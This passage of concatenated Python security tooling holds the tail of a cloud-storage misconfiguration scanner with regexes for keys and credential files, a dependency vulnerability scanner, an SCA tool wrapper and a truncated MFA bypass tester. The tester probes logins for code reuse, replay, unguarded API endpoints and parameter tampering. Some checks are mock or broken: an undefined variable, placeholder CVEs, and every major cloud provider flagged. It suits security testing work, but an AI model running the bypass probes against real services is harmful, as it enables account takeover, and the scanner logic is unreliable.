'severity': 'CRITICAL' if container['public_access'] == 'container' else 'HIGH',
'details': f'Access level: {container["public_access"]}'
})
# Check signed identifiers (SAS policies)
if access_policy['signed_identifiers']:
for sid in access_policy['signed_identifiers'].values():
# Check for overly permissive policies
permissions = sid.access_policy.permission
if 'r' in permissions and 'w' in permissions:
container_findings.append({
'container': container_name,
'issue': 'SAS policy allows both read and write',
'severity': 'HIGH',
'details': f'Permissions: {permissions}'
})
# Check for sensitive blobs
try:
blobs = container_client.list_blobs()
for blob in blobs:
if self.is_sensitive_file(blob.name):
container_findings.append({
'container': container_name,
'issue': 'Sensitive blob found',
'severity': 'HIGH',
'details': f'Blob: {blob.name}',
'url': f'https://{blob_service_client.account_name}.blob.core.windows.net/{container_name}/{blob.name}'
})
except:
pass
azure_findings.extend(container_findings)
except Exception as e:
print(f"[-] Azure storage scan error: {e}")
return azure_findings
def is_sensitive_file(self, filename):
"""Check if filename indicates sensitive content"""
sensitive_patterns = [
r'\.(pem|key|ppk|p12|pfx|crt|cer)$', # Certificates/keys
r'\.(env|config|conf|ini|properties|yml|yaml|xml|json)$', # Config files
r'\.(sql|db|sqlite|mdb|accdb)$', # Database files
r'\.(log|txt)$', # Log files
r'\.(bak|backup|old|orig|save|swp|tmp)$', # Backup files
r'(password|secret|token|key|credential)', # Sensitive names
r'(id_rsa|id_dsa|id_ecdsa)', # SSH keys
r'\.git/', # Git files
]
filename_lower = filename.lower()
for pattern in sensitive_patterns:
if re.search(pattern, filename_lower):
return True
return False
def run_cloud_storage_scan(self):
"""Run complete cloud storage scan"""
print("[*] Starting cloud storage misconfiguration scan")
all_findings = []
# AWS S3
print("[*] Scanning AWS S3...")
s3_findings = self.scan_aws_s3()
all_findings.extend(s3_findings)
print(f"[+] AWS S3 scan complete: {len(s3_findings)} findings")
# Google Cloud Storage
print("[*] Scanning Google Cloud Storage...")
gcs_findings = self.scan_google_cloud_storage()
all_findings.extend(gcs_findings)
print(f"[+] GCS scan complete: {len(gcs_findings)} findings")
# Azure Blob Storage
print("[*] Scanning Azure Blob Storage...")
azure_findings = self.scan_azure_blob_storage()
all_findings.extend(azure_findings)
print(f"[+] Azure scan complete: {len(azure_findings)} findings")
# Generate report
report = {
'total_findings': len(all_findings),
'findings_by_severity': self.categorize_findings(all_findings),
'findings_by_service': {
'AWS S3': len(s3_findings),
'Google Cloud Storage': len(gcs_findings),
'Azure Blob Storage': len(azure_findings)
},
'detailed_findings': all_findings
}
return report
def categorize_findings(self, findings):
"""Categorize findings by severity"""
categories = {
'CRITICAL': [],
'HIGH': [],
'MEDIUM': [],
'LOW': []
}
for finding in findings:
severity = finding.get('severity', 'MEDIUM')
if severity in categories:
categories[severity].append(finding)
return {k: len(v) for k, v in categories.items()}
# Usage
import time
scanner = CloudStorageScanner(
aws_profile='production',
gcp_credentials='/path/to/credentials.json',
azure_connection_string='DefaultEndpointsProtocol=https;AccountName=...'
)
report = scanner.run_cloud_storage_scan()
print(f"\n{'='*60}")
print("CLOUD STORAGE MISCONFIGURATION REPORT")
print(f"{'='*60}")
print(f"Total Findings: {report['total_findings']}")
print(f"\nFindings by Service:")
for service, count in report['findings_by_service'].items():
if count > 0:
print(f" {service}: {count}")
print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
if count > 0:
print(f" {severity}: {count}")
# Print critical findings
critical_findings = [f for f in report['detailed_findings'] if f.get('severity') == 'CRITICAL']
if critical_findings:
print(f"\nCRITICAL FINDINGS:")
for finding in critical_findings[:5]:
print(f" - {finding.get('bucket', finding.get('container', 'Unknown'))}: {finding['issue']}")#!/usr/bin/env python3
"""
Advanced Dependency Vulnerability Scanner
Integrates multiple vulnerability databases and scanners
"""
import subprocess
import json
import yaml
import toml
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List, Set
import requests
from datetime import datetime
import concurrent.futures
class DependencyVulnerabilityScanner:
def __init__(self, project_path):
self.project_path = Path(project_path)
self.vulnerabilities = []
self.vulnerability_sources = {
'nvd': 'https://services.nvd.nist.gov/rest/json/cves/1.0',
'oss_index': 'https://ossindex.sonatype.org/api/v3/component-report',
'github_advisory': 'https://api.github.com/advisories'
}
def scan_all_dependencies(self):
"""Scan all dependency files in project"""
print(f"[*] Scanning project at {self.project_path}")
dependency_files = self.find_dependency_files()
print(f"[*] Found {len(dependency_files)} dependency files")
all_vulnerabilities = []
for dep_file in dependency_files:
print(f"[*] Scanning {dep_file.relative_to(self.project_path)}")
vulns = self.scan_dependency_file(dep_file)
all_vulnerabilities.extend(vulns)
# Remove duplicates
unique_vulns = self.deduplicate_vulnerabilities(all_vulnerabilities)
# Generate report
report = self.generate_report(unique_vulns)
return report
def find_dependency_files(self):
"""Find all dependency files in project"""
dependency_patterns = [
# Package managers
'package.json', 'yarn.lock', 'package-lock.json',
'requirements.txt', 'Pipfile', 'Pipfile.lock', 'poetry.lock',
'composer.json', 'composer.lock',
'Gemfile', 'Gemfile.lock',
'pom.xml', 'build.gradle', 'build.gradle.kts',
'go.mod', 'go.sum',
'Cargo.toml', 'Cargo.lock',
'nuget.config', 'packages.config',
'*.csproj', '*.vbproj',
# Configuration files that might contain dependencies
'.terraform.lock.hcl',
'docker-compose.yml', 'docker-compose.yaml',
'Dockerfile',
'environment.yml', # Conda
# Infrastructure as Code
'*.tf', # Terraform
'*.yml', '*.yaml', # Ansible, Kubernetes
# CI/CD
'.github/workflows/*.yml', '.github/workflows/*.yaml',
'.gitlab-ci.yml',
'Jenkinsfile',
'.circleci/config.yml',
# IDE/Editor
'.vsconfig',
]
found_files = []
for pattern in dependency_patterns:
if '*' in pattern:
# Handle glob patterns
for file in self.project_path.rglob(pattern):
if file.is_file():
found_files.append(file)
else:
# Specific file names
for file in self.project_path.rglob(pattern):
if file.is_file():
found_files.append(file)
return list(set(found_files))
def scan_dependency_file(self, file_path):
"""Scan specific dependency file"""
vulns = []
# Determine file type and use appropriate scanner
file_ext = file_path.suffix.lower()
file_name = file_path.name.lower()
try:
if file_name == 'package.json':
vulns = self.scan_npm_package(file_path)
elif file_name in ['yarn.lock', 'package-lock.json']:
vulns = self.scan_npm_lockfile(file_path)
elif file_name == 'requirements.txt':
vulns = self.scan_pip_requirements(file_path)
elif file_name in ['pom.xml', 'build.gradle', 'build.gradle.kts']:
vulns = self.scan_java_dependencies(file_path)
elif file_name in ['gemfile', 'gemfile.lock']:
vulns = self.scan_ruby_gems(file_path)
elif file_name in ['composer.json', 'composer.lock']:
vulns = self.scan_php_composer(file_path)
elif file_name in ['go.mod', 'go.sum']:
vulns = self.scan_go_modules(file_path)
elif file_name in ['cargo.toml', 'cargo.lock']:
vulns = self.scan_rust_cargo(file_path)
elif file_name in ['dockerfile']:
vulns = self.scan_dockerfile(file_path)
elif file_ext in ['.tf', '.hcl']:
vulns = self.scan_terraform(file_path)
elif file_ext in ['.yml', '.yaml']:
vulns = self.scan_yaml_dependencies(file_path)
elif file_ext in ['.csproj', '.vbproj']:
vulns = self.scan_dotnet_proj(file_path)
except Exception as e:
print(f"[-] Error scanning {file_path}: {e}")
return vulns
def scan_npm_package(self, file_path):
"""Scan npm package.json for vulnerabilities"""
vulns = []
with open(file_path) as f:
package_data = json.load(f)
# Check dependencies
all_deps = {}
all_deps.update(package_data.get('dependencies', {}))
all_deps.update(package_data.get('devDependencies', {}))
all_deps.update(package_data.get('peerDependencies', {}))
all_deps.update(package_data.get('optionalDependencies', {}))
# Use npm audit or check against vulnerability DB
for dep, version in all_deps.items():
# Clean version string
clean_version = version.replace('^', '').replace('~', '').replace('>=', '').replace('<=', '')
# Check vulnerability databases
dep_vulns = self.check_vulnerability_db('npm', dep, clean_version)
vulns.extend(dep_vulns)
return vulns
def scan_npm_lockfile(self, file_path):
"""Scan npm lockfile for precise versions"""
vulns = []
with open(file_path) as f:
if file_path.name == 'package-lock.json':
lock_data = json.load(f)
# Parse package-lock.json structure
if 'packages' in lock_data:
for pkg_path, pkg_info in lock_data['packages'].items():
if pkg_path and 'version' in pkg_info:
pkg_name = pkg_path.split('node_modules/')[-1]
if not pkg_name.startswith('@'):
dep_vulns = self.check_vulnerability_db(
'npm', pkg_name, pkg_info['version']
)
vulns.extend(dep_vulns)
elif file_path.name == 'yarn.lock':
# Parse yarn.lock
content = f.read()
# Simplified parsing - in reality, use proper parser
lines = content.split('\n')
current_pkg = None
current_version = None
for line in lines:
line = line.strip()
if line and not line.startswith('#'):
if '"' in line and '@' in line:
# Package line
parts = line.split('@')
if len(parts) >= 2:
current_pkg = parts[0].strip('" ')
version_part = parts[1].split(',')[0].strip('" ')
if version_part:
current_version = version_part
elif 'version' in line.lower():
# Version line
version = line.split('"')[1] if '"' in line else line.split()[-1]
if current_pkg and current_version:
dep_vulns = self.check_vulnerability_db(
'npm', current_pkg, version
)
vulns.extend(dep_vulns)
current_pkg = None
current_version = None
return vulns
def scan_pip_requirements(self, file_path):
"""Scan Python requirements.txt"""
vulns = []
with open(file_path) as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
# Parse package name and version
parts = line.split('==')
if len(parts) == 2:
pkg_name = parts[0].strip()
version = parts[1].strip()
# Check for extras
if '[' in pkg_name:
pkg_name = pkg_name.split('[')[0]
dep_vulns = self.check_vulnerability_db('pypi', pkg_name, version)
vulns.extend(dep_vulns)
return vulns
def scan_java_dependencies(self, file_path):
"""Scan Java Maven/Gradle files"""
vulns = []
if file_path.name == 'pom.xml':
# Parse Maven pom.xml
tree = ET.parse(file_path)
root = tree.getroot()
# Namespace handling
ns = {'mvn': 'http://maven.apache.org/POM/4.0.0'}
# Check dependencies
for dep in root.findall('.//mvn:dependency', ns):
group_id = dep.find('mvn:groupId', ns)
artifact_id = dep.find('mvn:artifactId', ns)
version = dep.find('mvn:version', ns)
if group_id is not None and artifact_id is not None and version is not None:
pkg_name = f"{group_id.text}:{artifact_id.text}"
dep_vulns = self.check_vulnerability_db('maven', pkg_name, version.text)
vulns.extend(dep_vulns)
elif 'build.gradle' in file_path.name:
# Parse Gradle build file (simplified)
with open(file_path) as f:
content = f.read()
# Look for dependency declarations
import re
# implementation, api, compile, runtimeOnly patterns
patterns = [
r"(?:implementation|api|compile|runtimeOnly)\s+['\"]([^:'\"]+):([^:'\"]+):([^:'\"]+)['\"]",
r"(?:implementation|api|compile|runtimeOnly)\s+['\"]([^:'\"]+):([^:'\"]+)['\"]",
]
for pattern in patterns:
matches = re.findall(pattern, content)
for match in matches:
if len(match) == 3:
group, artifact, version = match
pkg_name = f"{group}:{artifact}"
dep_vulns = self.check_vulnerability_db('maven', pkg_name, version)
vulns.extend(dep_vulns)
return vulns
def check_vulnerability_db(self, ecosystem, package, version):
"""Check package against vulnerability databases"""
vulns = []
# This is a simplified version
# In reality, you would:
# 1. Query NVD API
# 2. Query OSS Index
# 3. Query GitHub Advisory Database
# 4. Query internal vulnerability DB
# For demonstration, we'll use a mock check
critical_packages = {
'npm': ['lodash', 'express', 'moment', 'axios'],
'pypi': ['django', 'flask', 'requests', 'urllib3'],
'maven': ['log4j', 'spring-core', 'jackson-databind'],
}
if ecosystem in critical_packages:
if package.lower() in [p.lower() for p in critical_packages[ecosystem]]:
# Mock vulnerability
vulns.append({
'ecosystem': ecosystem,
'package': package,
'version': version,
'vulnerability': 'CVE-2023-XXXXX',
'severity': 'HIGH',
'description': 'Mock vulnerability for demonstration',
'source': 'mock',
'file': str(file_path.relative_to(self.project_path))
})
return vulns
def scan_dockerfile(self, file_path):
"""Scan Dockerfile for vulnerable base images and packages"""
vulns = []
with open(file_path) as f:
lines = f.readlines()
for line in lines:
line = line.strip()
# Check base image
if line.upper().startswith('FROM'):
parts = line.split()
if len(parts) >= 2:
image = parts[1]
# Check for old or vulnerable base images
vulnerable_images = [
'node:8', 'python:2.7', 'ubuntu:14.04',
'alpine:3.5', 'centos:6', 'debian:8'
]
for vulnerable in vulnerable_images:
if vulnerable in image:
vulns.append({
'file': str(file_path.relative_to(self.project_path)),
'type': 'docker_image',
'image': image,
'vulnerability': 'Outdated base image',
'severity': 'HIGH',
'description': f'Base image {image} is outdated and may contain vulnerabilities'
})
# Check for apt-get install without version pins
elif 'apt-get install' in line and '=' not in line:
vulns.append({
'file': str(file_path.relative_to(self.project_path)),
'type': 'docker_package',
'line': line,
'vulnerability': 'Unpinned package versions',
'severity': 'MEDIUM',
'description': 'Package versions should be pinned to avoid unexpected updates'
})
return vulns
def scan_terraform(self, file_path):
"""Scan Terraform files for vulnerable providers/modules"""
vulns = []
with open(file_path) as f:
content = f.read()
# Look for provider declarations
import re
provider_patterns = [
r'provider\s+"([^"]+)"\s*{',
r'module\s+"([^"]+)"\s*{'
]
for pattern in provider_patterns:
matches = re.findall(pattern, content)
for match in matches:
# Check for known vulnerable providers/modules
vulnerable_providers = [
'aws', 'azurerm', 'google', 'kubernetes'
]
if any(vp in match.lower() for vp in vulnerable_providers):
vulns.append({
'file': str(file_path.relative_to(self.project_path)),
'type': 'terraform',
'provider': match,
'vulnerability': 'Potential misconfiguration',
'severity': 'MEDIUM',
'description': f'Provider {match} may have security implications'
})
return vulns
def deduplicate_vulnerabilities(self, vulnerabilities):
"""Remove duplicate vulnerabilities"""
unique_vulns = []
seen = set()
for vuln in vulnerabilities:
# Create unique identifier
vuln_id = f"{vuln.get('package', '')}:{vuln.get('version', '')}:{vuln.get('vulnerability', '')}"
if vuln_id not in seen:
seen.add(vuln_id)
unique_vulns.append(vuln)
return unique_vulns
def generate_report(self, vulnerabilities):
"""Generate comprehensive vulnerability report"""
report = {
'scan_date': datetime.now().isoformat(),
'project_path': str(self.project_path),
'total_vulnerabilities': len(vulnerabilities),
'vulnerabilities_by_severity': {},
'vulnerabilities_by_ecosystem': {},
'detailed_vulnerabilities': vulnerabilities
}
# Count by severity
severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
for severity in severities:
count = sum(1 for v in vulnerabilities if v.get('severity') == severity)
report['vulnerabilities_by_severity'][severity] = count
# Count by ecosystem
ecosystems = {}
for vuln in vulnerabilities:
ecosystem = vuln.get('ecosystem', 'unknown')
if ecosystem not in ecosystems:
ecosystems[ecosystem] = 0
ecosystems[ecosystem] += 1
report['vulnerabilities_by_ecosystem'] = ecosystems
return report
# Advanced integration with actual vulnerability databases
class AdvancedVulnerabilityChecker:
"""Integrates with real vulnerability databases"""
def __init__(self):
self.cache = {}
def check_nvd(self, cpe_string):
"""Check NVD database"""
# Format: cpe:2.3:a:apache:log4j:2.14.1:*:*:*:*:*:*:*
url = f"https://services.nvd.nist.gov/rest/json/cves/1.0?cpeMatchString={cpe_string}"
try:
response = requests.get(url, timeout=10)
if response.status_code == 200:
return response.json()
except:
pass
return None
def check_oss_index(self, ecosystem, package, version):
"""Check Sonatype OSS Index"""
url = "https://ossindex.sonatype.org/api/v3/component-report"
payload = {
"coordinates": [f"pkg:{ecosystem}/{package}@{version}"]
}
headers = {
"Content-Type": "application/json"
}
try:
response = requests.post(url, json=payload, headers=headers, timeout=10)
if response.status_code == 200:
return response.json()
except:
pass
return None
def check_github_advisory(self, ecosystem, package):
"""Check GitHub Advisory Database"""
url = f"https://api.github.com/advisories"
params = {
'ecosystem': ecosystem,
'package': package
}
headers = {
'Accept': 'application/vnd.github+json'
}
try:
response = requests.get(url, params=params, headers=headers, timeout=10)
if response.status_code == 200:
return response.json()
except:
pass
return None
# Usage
scanner = DependencyVulnerabilityScanner("/path/to/your/project")
report = scanner.scan_all_dependencies()
print(f"\n{'='*60}")
print("DEPENDENCY VULNERABILITY SCAN REPORT")
print(f"{'='*60}")
print(f"Project: {report['project_path']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Vulnerabilities: {report['total_vulnerabilities']}")
print(f"\nBy Severity:")
for severity, count in report['vulnerabilities_by_severity'].items():
if count > 0:
print(f" {severity}: {count}")
print(f"\nBy Ecosystem:")
for ecosystem, count in report['vulnerabilities_by_ecosystem'].items():
if count > 0:
print(f" {ecosystem}: {count}")
# Print critical vulnerabilities
critical_vulns = [v for v in report['detailed_vulnerabilities']
if v.get('severity') == 'CRITICAL']
if critical_vulns:
print(f"\nCRITICAL VULNERABILITIES:")
for vuln in critical_vulns[:5]: # Show first 5
print(f" - {vuln.get('package')} {vuln.get('version')}: {vuln.get('vulnerability')}")#!/usr/bin/env python3
"""
Advanced Software Composition Analysis (SCA) Integration
Combines multiple SCA tools and vulnerability databases
"""
import subprocess
import json
import xml.etree.ElementTree as ET
from pathlib import Path
import tempfile
import os
class AdvancedSCAIntegrator:
def __init__(self, project_path):
self.project_path = Path(project_path)
self.results = {}
# Tool configurations
self.tools = {
'owasp_dependency_check': {
'command': 'dependency-check',
'args': ['--scan', '.', '--format', 'JSON', '--out', 'dependency-check-report.json'],
'report_file': 'dependency-check-report.json'
},
'snyk': {
'command': 'snyk',
'args': ['test', '--json'],
'report_file': None # Outputs to stdout
},
'trivy': {
'command': 'trivy',
'args': ['fs', '-f', 'json', '.'],
'report_file': None # Outputs to stdout
},
'npm_audit': {
'command': 'npm',
'args': ['audit', '--json'],
'report_file': None # Outputs to stdout
},
'pip_audit': {
'command': 'pip-audit',
'args': ['--format', 'json'],
'report_file': None # Outputs to stdout
}
}
def run_all_sca_tools(self):
"""Run all configured SCA tools"""
print(f"[*] Running SCA tools on {self.project_path}")
for tool_name, config in self.tools.items():
print(f"[*] Running {tool_name}...")
try:
result = self.run_tool(tool_name, config)
self.results[tool_name] = result
print(f"[+] {tool_name} completed successfully")
except Exception as e:
print(f"[-] {tool_name} failed: {e}")
self.results[tool_name] = {'error': str(e)}
# Merge and analyze results
merged_results = self.merge_results()
return merged_results
def run_tool(self, tool_name, config):
"""Run individual SCA tool"""
cmd = [config['command']] + config['args']
# Change to project directory
original_cwd = os.getcwd()
os.chdir(self.project_path)
try:
# Run command
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=300 # 5 minute timeout
)
if result.returncode != 0 and tool_name not in ['snyk', 'npm_audit']:
# Some tools return non-zero on vulnerabilities found
print(f"[-] {tool_name} returned {result.returncode}")
# Parse output
if config['report_file']:
# Read from report file
report_path = self.project_path / config['report_file']
if report_path.exists():
with open(report_path) as f:
output = json.load(f)
else:
output = {'error': 'Report file not found'}
else:
# Parse stdout
try:
output = json.loads(result.stdout)
except json.JSONDecodeError:
output = {'raw_output': result.stdout, 'stderr': result.stderr}
return {
'returncode': result.returncode,
'stdout': result.stdout[:1000], # First 1000 chars
'stderr': result.stderr[:1000],
'output': output
}
except subprocess.TimeoutExpired:
return {'error': 'Timeout expired'}
finally:
os.chdir(original_cwd)
def merge_results(self):
"""Merge results from multiple SCA tools"""
merged_vulnerabilities = []
# Extract vulnerabilities from each tool's output
for tool_name, result in self.results.items():
if 'output' in result and isinstance(result['output'], dict):
vulnerabilities = self.extract_vulnerabilities(tool_name, result['output'])
merged_vulnerabilities.extend(vulnerabilities)
# Deduplicate and prioritize
unique_vulns = self.deduplicate_vulnerabilities(merged_vulnerabilities)
# Generate unified report
report = {
'summary': {
'total_tools_run': len(self.results),
'tools_successful': sum(1 for r in self.results.values() if 'error' not in r),
'total_vulnerabilities': len(unique_vulns)
},
'tool_results': self.results,
'vulnerabilities': unique_vulns
}
return report
def extract_vulnerabilities(self, tool_name, output):
"""Extract vulnerabilities from tool-specific output format"""
vulnerabilities = []
if tool_name == 'owasp_dependency_check':
# OWASP Dependency Check format
if 'dependencies' in output:
for dep in output['dependencies']:
if 'vulnerabilities' in dep:
for vuln in dep['vulnerabilities']:
vulnerabilities.append({
'tool': tool_name,
'source': 'dependency-check',
'dependency': dep.get('fileName', 'Unknown'),
'vulnerability': vuln.get('name', 'Unknown'),
'severity': vuln.get('severity', 'MEDIUM').upper(),
'description': vuln.get('description', ''),
'cvss_score': vuln.get('cvssv3', {}).get('baseScore', 0),
'cwe': vuln.get('cwe', ''),
'references': vuln.get('references', [])
})
elif tool_name == 'snyk':
# Snyk format
if 'vulnerabilities' in output:
for vuln in output['vulnerabilities']:
vulnerabilities.append({
'tool': tool_name,
'source': 'snyk',
'package': vuln.get('packageName', 'Unknown'),
'vulnerability': vuln.get('title', 'Unknown'),
'severity': vuln.get('severity', 'MEDIUM').upper(),
'description': vuln.get('description', ''),
'cvss_score': vuln.get('cvssScore', 0),
'cwe': vuln.get('identifiers', {}).get('CWE', []),
'references': vuln.get('references', [])
})
elif tool_name == 'trivy':
# Trivy format
if 'Results' in output:
for result in output['Results']:
if 'Vulnerabilities' in result:
for vuln in result['Vulnerabilities']:
vulnerabilities.append({
'tool': tool_name,
'source': 'trivy',
'package': vuln.get('PkgName', 'Unknown'),
'vulnerability': vuln.get('VulnerabilityID', 'Unknown'),
'severity': vuln.get('Severity', 'MEDIUM').upper(),
'description': vuln.get('Description', ''),
'cvss_score': vuln.get('CVSS', {}).get('nvd', {}).get('V3Score', 0),
'references': vuln.get('References', [])
})
elif tool_name == 'npm_audit':
# npm audit format
if 'vulnerabilities' in output:
for pkg_name, vuln_info in output['vulnerabilities'].items():
if 'via' in vuln_info:
for via in vuln_info['via']:
if isinstance(via, dict): # Vulnerability object
vulnerabilities.append({
'tool': tool_name,
'source': 'npm-audit',
'package': pkg_name,
'vulnerability': via.get('title', 'Unknown'),
'severity': via.get('severity', 'MEDIUM').upper(),
'description': via.get('description', ''),
'cvss_score': via.get('cvss', {}).get('score', 0),
'references': via.get('urls', [])
})
return vulnerabilities
def deduplicate_vulnerabilities(self, vulnerabilities):
"""Remove duplicate vulnerabilities across tools"""
unique_vulns = []
seen_identifiers = set()
for vuln in vulnerabilities:
# Create unique identifier
identifier = f"{vuln.get('package')}:{vuln.get('vulnerability')}"
if identifier not in seen_identifiers:
seen_identifiers.add(identifier)
unique_vulns.append(vuln)
else:
# Update existing vulnerability with additional tool info
for existing in unique_vulns:
if (existing.get('package') == vuln.get('package') and
existing.get('vulnerability') == vuln.get('vulnerability')):
# Add tool to list if not already there
if 'detected_by' not in existing:
existing['detected_by'] = []
if vuln.get('tool') not in existing['detected_by']:
existing['detected_by'].append(vuln.get('tool'))
# Sort by severity (CRITICAL, HIGH, MEDIUM, LOW)
severity_order = {'CRITICAL': 0, 'HIGH': 1, 'MEDIUM': 2, 'LOW': 3}
unique_vulns.sort(key=lambda x: severity_order.get(x.get('severity', 'MEDIUM'), 4))
return unique_vulns
def generate_remediation_plan(self, vulnerabilities):
"""Generate remediation plan for vulnerabilities"""
remediation = {
'immediate_actions': [],
'short_term_actions': [],
'long_term_actions': []
}
for vuln in vulnerabilities:
severity = vuln.get('severity', 'MEDIUM')
action = {
'vulnerability': vuln.get('vulnerability'),
'package': vuln.get('package'),
'severity': severity,
'action': self.get_remediation_action(vuln)
}
if severity in ['CRITICAL', 'HIGH']:
remediation['immediate_actions'].append(action)
elif severity == 'MEDIUM':
remediation['short_term_actions'].append(action)
else:
remediation['long_term_actions'].append(action)
return remediation
def get_remediation_action(self, vulnerability):
"""Get specific remediation action for vulnerability"""
package = vulnerability.get('package', '')
tool = vulnerability.get('tool', '')
actions = []
# Package manager specific actions
if 'package.json' in package or tool == 'npm_audit':
actions.append("Run 'npm audit fix' to automatically fix vulnerabilities")
actions.append("Update package.json with fixed versions")
elif 'requirements.txt' in package or 'Pipfile' in package:
actions.append("Update requirements.txt/Pipfile with secure versions")
actions.append("Run 'pip-audit' to identify fixes")
elif 'pom.xml' in package or 'build.gradle' in package:
actions.append("Update Maven/Gradle dependencies")
actions.append("Use versions-maven-plugin for dependency management")
# General actions
actions.append("Review vulnerability details and assess impact")
actions.append("Test updates in development environment before production")
actions.append("Consider using dependency locking (package-lock.json, Pipfile.lock)")
return actions
# Usage
sca = AdvancedSCAIntegrator("/path/to/your/project")
results = sca.run_all_sca_tools()
print(f"\n{'='*60}")
print("SOFTWARE COMPOSITION ANALYSIS RESULTS")
print(f"{'='*60}")
print(f"Tools Run: {results['summary']['total_tools_run']}")
print(f"Tools Successful: {results['summary']['tools_successful']}")
print(f"Total Vulnerabilities Found: {results['summary']['total_vulnerabilities']}")
# Generate remediation plan
remediation = sca.generate_remediation_plan(results['vulnerabilities'])
print(f"\nREMEDIATION PLAN")
print(f"{'='*60}")
print(f"\nImmediate Actions ({len(remediation['immediate_actions'])}):")
for action in remediation['immediate_actions'][:3]: # Show first 3
print(f" - {action['package']}: {action['vulnerability']}")
for step in action['action'][:2]:
print(f" * {step}")
print(f"\nShort Term Actions ({len(remediation['short_term_actions'])}):")
for action in remediation['short_term_actions'][:2]:
print(f" - {action['package']}: {action['vulnerability']}")
# Export results
with open('sca-report.json', 'w') as f:
json.dump(results, f, indent=2)
with open('remediation-plan.json', 'w') as f:
json.dump(remediation, f, indent=2)
print(f"\n[*] Reports saved to sca-report.json and remediation-plan.json")#!/usr/bin/env python3
"""
Advanced MFA Bypass Testing Framework
Tests various MFA implementations for weaknesses
"""
import requests
import time
import pyotp
import re
from typing import Dict, List
from urllib.parse import urljoin, urlparse
class MFABypassTester:
def __init__(self, base_url, session_cookies=None):
self.base_url = base_url
self.session = requests.Session()
if session_cookies:
self.session.cookies.update(session_cookies)
# MFA bypass techniques
self.techniques = {
'backup_code_reuse': self.test_backup_code_reuse,
'mfa_code_replay': self.test_code_replay,
'mfa_timeout_bypass': self.test_timeout_bypass,
'session_fixation_mfa': self.test_session_fixation,
'api_endpoint_bypass': self.test_api_endpoint_bypass,
'response_manipulation': self.test_response_manipulation,
'rate_limit_bypass': self.test_rate_limit_bypass
}
def test_backup_code_reuse(self):
"""Test if backup codes can be reused"""
findings = []
# Scenario: Backup codes should be single-use
test_cases = [
{'code': '12345678', 'expected': 'should fail on second use'},
{'code': '87654321', 'expected': 'should fail on second use'}
]
for test in test_cases:
backup_code = test['code']
# First use
response1 = self.submit_backup_code(backup_code)
if response1.status_code == 200:
# Immediately try second use
response2 = self.submit_backup_code(backup_code)
if response2.status_code == 200:
findings.append({
'technique': 'backup_code_reuse',
'vulnerability': 'Backup codes can be reused',
'code': backup_code,
'evidence': f'Code accepted twice: {backup_code}'
})
return findings
def test_code_replay(self):
"""Test if TOTP codes can be replayed"""
findings = []
# This requires timing and observation
# Approach: Capture a valid code and try to reuse it
# Simulate: Get current TOTP code (in real test, you'd capture this)
# For demonstration, we'll use a known secret
totp_secret = "JBSWY3DPEHPK3PXP" # Example secret
totp = pyotp.TOTP(totp_secret)
current_code = totp.now()
# Submit code
response1 = self.submit_totp_code(current_code)
if response1.status_code == 200:
# Wait for next time interval
time.sleep(31) # TOTP codes typically valid for 30 seconds
# Try same code again
response2 = self.submit_totp_code(current_code)
if response2.status_code == 200:
findings.append({
'technique': 'mfa_code_replay',
'vulnerability': 'Expired TOTP codes can be replayed',
'evidence': f'Code {current_code} accepted after expiration'
})
return findings
def test_timeout_bypass(self):
"""Test MFA timeout bypass"""
findings = []
# Test if MFA step times out or can be bypassed by waiting
# 1. Start MFA process
start_response = self.start_mfa_process()
if start_response.status_code == 200:
# 2. Wait longer than timeout (e.g., 5 minutes)
print("[*] Waiting for MFA timeout (300 seconds)...")
time.sleep(300)
# 3. Try to submit code anyway
test_code = '000000'
response = self.submit_totp_code(test_code)
if response.status_code == 200:
findings.append({
'technique': 'mfa_timeout_bypass',
'vulnerability': 'MFA does not timeout',
'evidence': 'MFA code accepted after 5 minute delay'
})
return findings
def test_session_fixation(self):
"""Test for MFA session fixation"""
findings = []
# 1. Get session before MFA
session_before = self.get_session_state()
# 2. Complete MFA
self.complete_mfa()
# 3. Get session after MFA
session_after = self.get_session_state()
# 4. Try to use pre-MFA session
if session_before and session_after:
if session_before != session_after:
# Session changed after MFA (good)
# Now try to use old session
old_session_response = self.use_session(session_before)
if old_session_response.status_code == 200:
findings.append({
'technique': 'session_fixation_mfa',
'vulnerability': 'Pre-MFA sessions remain valid',
'evidence': 'Old session accepted after MFA completion'
})
return findings
def test_api_endpoint_bypass(self):
"""Test for API endpoints that bypass MFA"""
findings = []
# Common API endpoints that might bypass MFA
api_endpoints = [
'/api/user/profile',
'/api/account/settings',
'/api/tokens/create',
'/api/session/refresh',
'/api/auth/verify',
'/api/mfa/status',
'/api/authenticated'
]
for endpoint in api_endpoints:
url = urljoin(self.base_url, endpoint)
# Try to access without completing MFA
response = self.session.get(url)
if response.status_code == 200:
# Check if endpoint returns sensitive data
sensitive_indicators = ['email', 'phone', 'address', 'permissions', 'roles']
response_text = response.text.lower()
if any(indicator in response_text for indicator in sensitive_indicators):
findings.append({
'technique': 'api_endpoint_bypass',
'vulnerability': f'API endpoint bypasses MFA: {endpoint}',
'evidence': f'Endpoint {endpoint} accessible without MFA'
})
return findings
def test_response_manipulation(self):
"""Test MFA response manipulation"""
findings = []
# Capture MFA verification request
mfa_request = {
'url': urljoin(self.base_url, '/api/mfa/verify'),
'method': 'POST',
'headers': {
'Content-Type': 'application/json'
},
'data': {
'code': '123456',
'device_id': 'test_device'
}
}
# Test various response manipulations
# 1. Change status code in response
manipulated_responses = [
{'status': 'success', 'verified': True},
{'status': 'verified', 'mfa_passed': True},
{'authenticated': True, 'mfa_complete': True},
{'result': 'ok', 'code': 200}
]
for manipulated_response in manipulated_responses:
# This would require intercepting and modifying the response
# For demonstration, we'll simulate
print(f"[*] Testing response manipulation: {manipulated_response}")
# 2. Test parameter manipulation
parameters = ['verified', 'success', 'authenticated', 'status']
for param in parameters:
test_data = {'code': '123456', param: 'true'}
response = self.session.post(
mfa_request['url'],
json=test_data,
headers=mfa_request['headers']
)
if response.status_code == 200:
try:
response_data = response.json()
if response_data.get('authenticated') or response_data.get('verified'):
findings.append({
'technique': 'response_manipulation',
'vulnerability': f'MFA bypass via parameter: {param}',
'evidence': f'Parameter {param}=true bypassed MFA'
})
except:
pass
return findings
def test_rate_limit_bypass(self):
"""Test MFA rate limiting bypass"""
findings = []
# Test brute force protection
